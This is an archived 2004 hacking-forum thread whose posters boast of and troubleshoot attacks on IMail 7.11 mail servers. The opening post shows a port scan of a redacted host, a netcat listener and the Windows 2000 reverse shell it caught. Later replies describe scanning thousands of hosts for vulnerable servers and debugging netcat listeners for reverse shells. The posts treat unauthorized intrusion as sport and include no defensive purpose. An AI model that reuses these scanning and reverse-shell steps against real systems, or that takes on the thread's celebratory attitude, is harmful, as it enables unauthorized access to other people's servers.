hacking contest

hacking exploits security forum
hacking
compliance articles
upgrade backup exec
information security consultant
Help - Search - Member List - Calendar
GovernmentSecurity.org > The Archives > Exploit Articles
Pages: 1, 2, 3
Fernando093
Mar 10 2004, 12:30 AM
scanline Report:

-------------------------------------------------------------------------------
x4.x4.xx4.xx4
Responds with ICMP unreachable: No
TCP ports: 25


TCP 25:
[220 mail.xxxxxxxxxxxxxx.org (IMail 7.11 121162-1) NT-ESMTP Server X1]

-------------------------------------------------------------------------------



C:\X>nc -l -vv -p 444
listening on [any] 444 ...



x4.x4.xx4.xx4: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [xx.xx.xx.xx] from (UNKNOWN) [x4.x4.xx4.xx4] 1336: NO_DATA
Microsoft Windows 2000 [Version 5.00.2195]
© Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>


-------------------------------------------------------------------------------

Shell success............... biggrin.gif biggrin.gif biggrin.gif

Notice the server is running a IMail v7.11


GretZ......

Fernando........



slb33
Mar 10 2004, 12:41 AM
Man, your lucky wink.gif

I have found many IMail computers and have had no luck with any of them sad.gif

Haven't really heard to many success stories.
blahplok
Mar 10 2004, 12:53 AM
yeah... it's your luck, pernando.... i'v scan more than 10000 and have no vuln host.. sad.gif sad.gif
touk
Mar 11 2004, 01:37 PM
really few servers to exploit but nice one smile.gif
[eXPhase
Mar 11 2004, 01:46 PM
Also started scanning on imails, also haven't got any shells a.t.m.
som3aa
Mar 12 2004, 09:11 AM
QUOTE
any suggestions howto secure ?

run servu on the same exploit port h3h3 biggrin.gif
Shadower
Mar 12 2004, 11:54 AM
QUOTE (Niekos @ Mar 8 2004, 09:03 PM)
Can some one explain a few things for me?
What's nc?

NC is netcat, a utility that works a bit like telnet but a lot more powerfull + allows reverse connections.

Info and download here > www.atstake.com/research/tools/network_utilities/
NewBieMan
Mar 12 2004, 02:45 PM
I've scanned about 50 boxes running imail+ldap - no success, maybe it must be a 7.x service?
Anarchiste
Mar 19 2004, 08:29 PM
I have found some iMail servers but when i exploit them there is nothing in my netcat sad.gif ..i do nc -lvp 6666 and i exploit the server with 6666 like remote port but i didn't work,i think it's my router which block.Can you explain me the problem? Thx smile.gif
p.s : sorry for my bad english
aapje
Mar 19 2004, 10:17 PM
i tried some too, but i never got a shell...
cougar
Mar 20 2004, 12:14 AM
i did get 2 shells, only try'd few times. But maybe better exploit will come out soon wink.gif
lasantarosa
Mar 20 2004, 07:07 PM
hi,

i got the exploit working, on my own machine i get the following:

c:\nc -lvp 6666
listening on [any] 6666 ...
//then when the remote machine with imail wants to connect i get the typical connection part but then no shell but weird signs and then i can do some input, but no shell on the system.

what am i doing wrong ?

Presnus
Apr 9 2004, 09:11 AM
QUOTE (Fernando093 @ Mar 10 2004, 12:30 AM)
scanline Report:

-------------------------------------------------------------------------------
x4.x4.xx4.xx4
Responds with ICMP unreachable: No
TCP ports: 25


TCP 25:
[220 mail.xxxxxxxxxxxxxx.org (IMail 7.11 121162-1) NT-ESMTP Server X1]

-------------------------------------------------------------------------------



C:\X>nc -l -vv -p 444
listening on [any] 444 ...



x4.x4.xx4.xx4: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [xx.xx.xx.xx] from (UNKNOWN) [x4.x4.xx4.xx4] 1336: NO_DATA
Microsoft Windows 2000 [Version 5.00.2195]
© Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>


-------------------------------------------------------------------------------

Shell success............... biggrin.gif biggrin.gif biggrin.gif

Notice the server is running a IMail v7.11


GretZ......

Fernando........

So I have to scan port 25 ?? unsure.gif And What is the scanners program name that u use here ?
ivan288
Apr 9 2004, 09:36 AM
QUOTE (Presnus @ Apr 9 2004, 09:11 AM)
QUOTE (Fernando093 @ Mar 10 2004, 12:30 AM)
scanline Report:

-------------------------------------------------------------------------------
x4.x4.xx4.xx4
Responds with ICMP unreachable: No
TCP ports: 25


TCP 25:
[220 mail.xxxxxxxxxxxxxx.org (IMail 7.11 121162-1) NT-ESMTP Server X1]

-------------------------------------------------------------------------------



C:\X>nc -l -vv -p 444
listening on [any] 444 ...



x4.x4.xx4.xx4: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [xx.xx.xx.xx] from (UNKNOWN) [x4.x4.xx4.xx4] 1336: NO_DATA
Microsoft Windows 2000 [Version 5.00.2195]
© Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>


-------------------------------------------------------------------------------

Shell success............... biggrin.gif  biggrin.gif  biggrin.gif

Notice the server is running a IMail v7.11


GretZ......

Fernando........

So I have to scan port 25 ?? unsure.gif And What is the scanners program name that u use here ?

It's called scanline and can be found in the download section.

btw nice sploit, i'll try and report back.
ivan288
Apr 10 2004, 06:46 PM
btw anyone found out how to see wheter its express, professional or evaluation verisons???
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
 
Invision Power Board © 2001-2005 Invision Power Services, Inc.